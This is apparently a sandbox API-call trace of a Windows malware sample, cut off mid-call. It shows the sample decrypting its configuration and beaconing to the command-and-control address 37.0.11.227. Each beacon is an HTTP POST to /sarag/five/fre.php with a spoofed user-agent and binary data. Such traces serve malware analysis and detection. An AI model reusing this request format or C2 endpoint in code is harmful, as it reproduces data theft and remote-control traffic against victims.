RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0231.985] GetProcessHeap () returned 0x690000 [0231.985] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0231.986] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0231.987] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0231.987] GetProcessHeap () returned 0x690000 [0231.987] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0231.987] GetProcessHeap () returned 0x690000 [0231.987] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0231.987] GetProcessHeap () returned 0x690000 [0231.987] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0231.987] GetProcessHeap () returned 0x690000 [0231.987] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0231.988] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0231.989] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0231.989] GetProcessHeap () returned 0x690000 [0231.989] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0231.989] GetProcessHeap () returned 0x690000 [0231.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0231.989] send (s=0x608, buf=0x6ad508*, len=242, flags=0) returned 242 [0231.990] send (s=0x608, buf=0x6aba40*, len=159, flags=0) returned 159 [0231.990] GetProcessHeap () returned 0x690000 [0231.990] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0231.990] recv (in: s=0x608, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0232.230] GetProcessHeap () returned 0x690000 [0232.230] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0232.230] GetProcessHeap () returned 0x690000 [0232.231] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0232.231] GetProcessHeap () returned 0x690000 [0232.231] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0232.232] GetProcessHeap () returned 0x690000 [0232.233] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0232.233] closesocket (s=0x608) returned 0 [0232.234] GetProcessHeap () returned 0x690000 [0232.234] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x690000) returned 1 [0232.234] GetProcessHeap () returned 0x690000 [0232.235] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0232.235] GetProcessHeap () returned 0x690000 [0232.235] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0232.235] GetProcessHeap () returned 0x690000 [0232.235] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0232.236] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xe2c) returned 0x608 [0232.238] Sleep (dwMilliseconds=0xea60) [0232.249] GetProcessHeap () returned 0x690000 [0232.249] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0232.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.263] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0232.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.272] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0232.282] GetProcessHeap () returned 0x690000 [0232.282] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0232.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.283] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0232.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.291] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0232.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.293] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0232.293] GetProcessHeap () returned 0x690000 [0232.293] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0232.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.294] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0232.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.296] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0232.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.297] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0232.297] GetProcessHeap () returned 0x690000 [0232.297] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0232.298] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0232.408] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0232.408] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0232.409] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0232.410] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0232.410] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0232.411] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0232.411] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0232.412] GetProcessHeap () returned 0x690000 [0232.412] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0232.412] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0232.412] GetProcessHeap () returned 0x690000 [0232.413] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0232.413] GetProcessHeap () returned 0x690000 [0232.413] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0232.413] GetProcessHeap () returned 0x690000 [0232.414] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0232.414] GetProcessHeap () returned 0x690000 [0232.414] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0232.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.415] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0232.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.422] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0232.430] GetProcessHeap () returned 0x690000 [0232.430] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0232.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.431] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0232.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.432] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0232.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.433] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0232.433] GetProcessHeap () returned 0x690000 [0232.434] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0232.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.436] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0232.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.438] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0232.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.439] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0232.439] GetProcessHeap () returned 0x690000 [0232.439] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0232.440] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0232.440] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0232.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0232.441] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0232.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0232.442] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0232.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0232.443] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0232.444] GetProcessHeap () returned 0x690000 [0232.444] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0232.444] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0232.444] GetProcessHeap () returned 0x690000 [0232.444] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0232.444] socket (af=2, type=1, protocol=6) returned 0x60c [0232.444] connect (s=0x60c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0232.471] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0232.471] GetProcessHeap () returned 0x690000 [0232.471] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0232.471] GetProcessHeap () returned 0x690000 [0232.472] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0232.472] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0232.473] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0232.473] GetProcessHeap () returned 0x690000 [0232.473] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0232.473] GetProcessHeap () returned 0x690000 [0232.474] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0232.474] GetProcessHeap () returned 0x690000 [0232.474] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0232.474] GetProcessHeap () returned 0x690000 [0232.474] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0232.475] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0232.476] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0232.476] GetProcessHeap () returned 0x690000 [0232.476] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0232.476] GetProcessHeap () returned 0x690000 [0232.476] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0232.476] send (s=0x60c, buf=0x6ad508*, len=242, flags=0) returned 242 [0232.477] send (s=0x60c, buf=0x6aba40*, len=159, flags=0) returned 159 [0232.477] GetProcessHeap () returned 0x690000 [0232.477] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0232.477] recv (in: s=0x60c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0232.554] GetProcessHeap () returned 0x690000 [0232.554] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0232.554] GetProcessHeap () returned 0x690000 [0232.554] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0232.555] GetProcessHeap () returned 0x690000 [0232.555] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0232.556] GetProcessHeap () returned 0x690000 [0232.556] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0232.556] closesocket (s=0x60c) returned 0 [0232.557] GetProcessHeap () returned 0x690000 [0232.557] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0232.557] GetProcessHeap () returned 0x690000 [0232.557] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0232.557] GetProcessHeap () returned 0x690000 [0232.558] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0232.558] GetProcessHeap () returned 0x690000 [0232.558] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0232.558] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x6f8) returned 0x60c [0232.560] Sleep (dwMilliseconds=0xea60) [0232.562] GetProcessHeap () returned 0x690000 [0232.562] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0232.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.563] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0232.568] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.569] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0232.576] GetProcessHeap () returned 0x690000 [0232.576] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0232.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.577] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0232.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.578] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0232.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.579] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0232.579] GetProcessHeap () returned 0x690000 [0232.579] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0232.580] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.580] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0232.581] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.585] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0232.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.586] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0232.586] GetProcessHeap () returned 0x690000 [0232.586] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0232.587] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0232.587] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0232.588] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0232.588] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0232.589] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0232.589] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0232.589] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0232.590] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0232.590] GetProcessHeap () returned 0x690000 [0232.590] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0232.590] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0232.590] GetProcessHeap () returned 0x690000 [0232.591] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0232.591] GetProcessHeap () returned 0x690000 [0232.591] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0232.591] GetProcessHeap () returned 0x690000 [0232.591] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0232.591] GetProcessHeap () returned 0x690000 [0232.591] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0232.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.593] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0232.598] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.599] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0232.605] GetProcessHeap () returned 0x690000 [0232.605] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0232.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.607] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0232.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.608] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0232.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.609] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0232.609] GetProcessHeap () returned 0x690000 [0232.609] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0232.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.611] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0232.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.612] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0232.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0232.612] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0232.612] GetProcessHeap () returned 0x690000 [0232.612] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0232.613] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0232.613] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0232.614] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0232.614] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0232.615] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0232.615] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0232.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0232.618] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0232.618] GetProcessHeap () returned 0x690000 [0232.619] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0232.619] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0232.619] GetProcessHeap () returned 0x690000 [0232.619] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab440 [0232.619] socket (af=2, type=1, protocol=6) returned 0x610 [0232.619] connect (s=0x610, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0232.642] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0232.642] GetProcessHeap () returned 0x690000 [0232.642] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0232.642] GetProcessHeap () returned 0x690000 [0232.642] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0232.643] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0232.644] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0232.644] GetProcessHeap () returned 0x690000 [0232.644] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0232.644] GetProcessHeap () returned 0x690000 [0232.644] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0232.645] GetProcessHeap () returned 0x690000 [0232.645] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0232.645] GetProcessHeap () returned 0x690000 [0232.645] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0232.645] LoadLibraryW 